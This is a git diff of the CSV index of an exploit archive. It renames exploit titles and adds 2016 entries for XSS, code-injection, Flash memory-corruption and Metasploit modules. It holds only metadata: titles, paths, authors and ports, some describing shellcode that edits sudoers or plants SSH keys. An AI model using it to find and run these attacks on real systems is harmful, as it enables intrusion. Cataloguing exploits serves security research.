diff --git a/files.csv b/files.csv
index fac0ee4c5..5be144729 100755
--- a/files.csv
+++ b/files.csv
@@ -334,7 +334,7 @@ id,file,description,date,author,platform,type,port
 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0
 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service Vulnerability",2004-07-22,"Peter Kruse",hardware,dos,0
 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
-360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS",2004-07-22,bkbll,multiple,dos,80
+360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)",2004-07-22,bkbll,multiple,dos,80
 361,platforms/windows/remote/361.txt,"Flash FTP Server Directory Traversal",2004-07-22,CoolICE,windows,remote,0
 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0
@@ -345,7 +345,7 @@ id,file,description,date,author,platform,type,port
 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
-371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS",2004-08-02,N/A,linux,dos,0
+371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)",2004-08-02,N/A,linux,dos,0
 372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21
 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0
@@ -515,9 +515,9 @@ id,file,description,date,author,platform,type,port
 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
 665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 - (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
-668,platforms/windows/remote/668.c,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)",2004-11-30,JohnH,windows,remote,143
+668,platforms/windows/remote/668.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)",2004-11-30,JohnH,windows,remote,143
 669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0
-670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143
+670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)",2004-12-01,JohnH,windows,remote,143
 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed <= 1.05 - Format String / Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0
 673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0
@@ -849,9 +849,9 @@ id,file,description,date,author,platform,type,port
 1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.php SQL Injection",2005-06-08,N/A,php,webapps,0
 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0
 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143
-1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0
-1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
-1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0
+1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0
+1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
+1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0
 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0
 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
@@ -871,8 +871,8 @@ id,file,description,date,author,platform,type,port
 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0
 1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0
 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
-1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)",2005-06-22,g30rg3_x,php,dos,0
-1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)",2005-06-22,HaCkZaTaN,php,dos,0
+1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0
+1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0
 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0
 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0
@@ -1131,7 +1131,7 @@ id,file,description,date,author,platform,type,port
 1358,platforms/php/webapps/1358.php,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0
 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0
 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0
-1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (c code)",2005-12-07,unitedasia,php,webapps,0
+1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
 1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC",2005-12-07,ZIPLOCK,windows,dos,0
 1363,platforms/php/webapps/1363.php,"Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0
 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0
@@ -1181,7 +1181,7 @@ id,file,description,date,author,platform,type,port
 1412,platforms/linux/local/1412.rb,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0
 1413,platforms/windows/remote/1413.c,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0
 1414,platforms/windows/remote/1414.pl,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060
-1415,platforms/linux/local/1415.c,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)",2006-01-13,Qnix,linux,local,0
+1415,platforms/linux/local/1415.c,"Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)",2006-01-13,Qnix,linux,local,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 (NLST) Denial of Service Vulnerability",2006-01-14,pi3ch,windows,dos,0
 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003
 1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0
@@ -2704,7 +2704,7 @@ id,file,description,date,author,platform,type,port
 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0
 3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0
-3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
+3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
 3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability",2006-12-28,"the master",php,webapps,0
 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0
@@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
-3200,platforms/osx/dos/3200.rb,"Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)",2007-01-25,MoAB,osx,dos,0
+3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0
 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0
 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0
@@ -4981,7 +4981,7 @@ id,file,description,date,author,platform,type,port
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 - RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
-5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
+5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0
 5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0
 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0
@@ -6116,14 +6116,14 @@ id,file,description,date,author,platform,type,port
 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS <= 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0
 6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability",2008-09-23,d3v1l,php,webapps,0
 6543,platforms/php/webapps/6543.txt,"Ol Bookmarks Manager 0.7.5 - Local File Inclusion Vulnerability",2008-09-23,dun,php,webapps,0
-6544,platforms/php/webapps/6544.txt,"WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability",2008-09-23,GoLd_M,php,webapps,0
+6544,platforms/php/webapps/6544.txt,"WebPortal CMS <= 0.7.4 - (code) Remote Code Execution Vulnerability",2008-09-23,GoLd_M,php,webapps,0
 6545,platforms/php/webapps/6545.txt,"Hotscripts Clone (cid) Remote SQL Injection Vulnerability",2008-09-24,"Hussin X",php,webapps,0
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 - RFI / LFI / SQL Injection Vulnerabilities",2008-09-24,GoLd_M,php,webapps,0
 6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0
 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection Vulnerability",2008-09-24,GoLd_M,php,webapps,0
-6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
+6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 (docs.php doc) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 (defs.php l) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
@@ -7489,7 +7489,7 @@ id,file,description,date,author,platform,type,port
 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,x0r,php,webapps,0
 7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 - (.torrent) BoF Exploit",2009-02-03,SkD,windows,local,0
 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0
-7959,platforms/php/webapps/7959.txt,"Simple Machines Forums (BBCode) Cookie Stealing Vulnerability",2009-02-03,Xianur0,php,webapps,0
+7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing Vulnerability",2009-02-03,Xianur0,php,webapps,0
 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Remote Shell Upload Vulnerability",2009-02-03,"Hussin X",php,webapps,0
 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0
 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0
@@ -8366,7 +8366,7 @@ id,file,description,date,author,platform,type,port
 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure Vulnerability",2009-06-03,"Nico Leidecker",php,webapps,0
 8869,platforms/php/webapps/8869.txt,"Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability",2009-06-03,DD3str0y3r,php,webapps,0
 8870,platforms/php/webapps/8870.txt,"Joomla Omilen Photo Gallery 0.5b - Local File Inclusion Vulnerability",2009-06-03,ByALBAYX,php,webapps,0
-8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability",2009-06-03,SirGod,php,webapps,0
+8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution Vulnerability",2009-06-03,SirGod,php,webapps,0
 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres Multiple SQL Injection Vulnerabilities",2009-06-03,"Chip d3 bi0s",php,webapps,0
 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit",2009-06-04,"Jon Oberheide",multiple,dos,0
 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0
@@ -8379,7 +8379,7 @@ id,file,description,date,author,platform,type,port
 8881,platforms/windows/local/8881.php,"PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0
 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 (idx) Remote SQL Injection Vulnerability",2009-06-05,snakespc,php,webapps,0
 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-06-05,"ThE g0bL!N",php,webapps,0
-8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability",2009-06-05,YEnH4ckEr,php,webapps,0
+8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row Vulnerability",2009-06-05,YEnH4ckEr,php,webapps,0
 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0
 8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection Vulnerability",2009-06-08,snakespc,php,webapps,0
 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure Vulnerability",2009-06-08,ByALBAYX,asp,webapps,0
@@ -9473,6 +9473,7 @@ id,file,description,date,author,platform,type,port
 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21
 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
+40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent XSS",2016-07-11,"Han Sahin",php,webapps,80
 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21
 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0
 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21
@@ -10720,6 +10721,7 @@ id,file,description,date,author,platform,type,port
 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0
 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0
 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
+40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80
 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0
 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote SQL Injection Vulnerability",2010-03-14,snakespc,php,webapps,0
 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0
@@ -11729,6 +11731,11 @@ id,file,description,date,author,platform,type,port
 13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 - reverse portbind (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 - execve /bin/sh (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 - execve /bin/sh (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
+40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
+40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0
+40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
+40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
+40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80
 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@@ -11801,7 +11808,7 @@ id,file,description,date,author,platform,type,port
 13329,platforms/lin_x86/shellcode/13329.c,"linux/x86 - connect-back port UDP/54321 live packet capture (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13330,platforms/lin_x86/shellcode/13330.c,"linux/x86 - append rsa key to /root/.ssh/authorized_keys2 (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13331,platforms/lin_x86/shellcode/13331.c,"linux/x86 - edit /etc/sudoers for full access (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
-13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
+13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector - Promiscuous mode detector shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
 13333,platforms/lin_x86/shellcode/13333.txt,"linux/x86 setuid(0) & execve(/bin/sh_0_0) shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
 13334,platforms/lin_x86/shellcode/13334.txt,"linux/x86 setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"linux/x86 - iopl(3); asm(cli); while(1){} (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
@@ -15232,6 +15239,7 @@ id,file,description,date,author,platform,type,port
 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0
 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0
 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0
+40085,platforms/windows/local/40085.rb,"MS16-016 mrxdav.sys WebDav Local Privilege Escalation",2016-07-11,metasploit,windows,local,0
 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0
 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0
 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0
@@ -17068,6 +17076,7 @@ id,file,description,date,author,platform,type,port
 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS Vulnerability",2000-01-05,"Ussr Labs",windows,dos,0
 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE Vulnerability",2000-01-04,anonymous,multiple,remote,0
 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal Vulnerability",2000-01-03,"k0ad k1d",cgi,remote,0
+40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,metasploit,ruby,remote,80
 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0
 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0
 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0
@@ -22493,7 +22502,7 @@ id,file,description,date,author,platform,type,port
 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection Vulnerabilities",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0
 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 GR_OSView Information Disclosure Vulnerability",2005-04-07,anonymous,irix,local,0
 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local Arbitrary File Overwrite Vulnerability",2005-04-07,anonymous,irix,local,0
-25363,platforms/windows/dos/25363.py,"Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH",2013-05-11,ariarat,windows,dos,0
+25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH",2013-05-11,ariarat,windows,dos,0
 25364,platforms/windows/dos/25364.txt,"AN HTTPD CMDIS.DLL Remote Buffer Overflow Vulnerability",2005-04-08,"Tan Chew Keong",windows,dos,0
 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection Vulnerability",2005-04-08,"Tan Chew Keong",windows,remote,0
 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0
@@ -29876,6 +29885,9 @@ id,file,description,date,author,platform,type,port
 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component - 'id' Parameter SQL Injection Vulnerability",2009-06-28,Prince_Pwn3r,php,webapps,0
 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0
 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0
+40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80
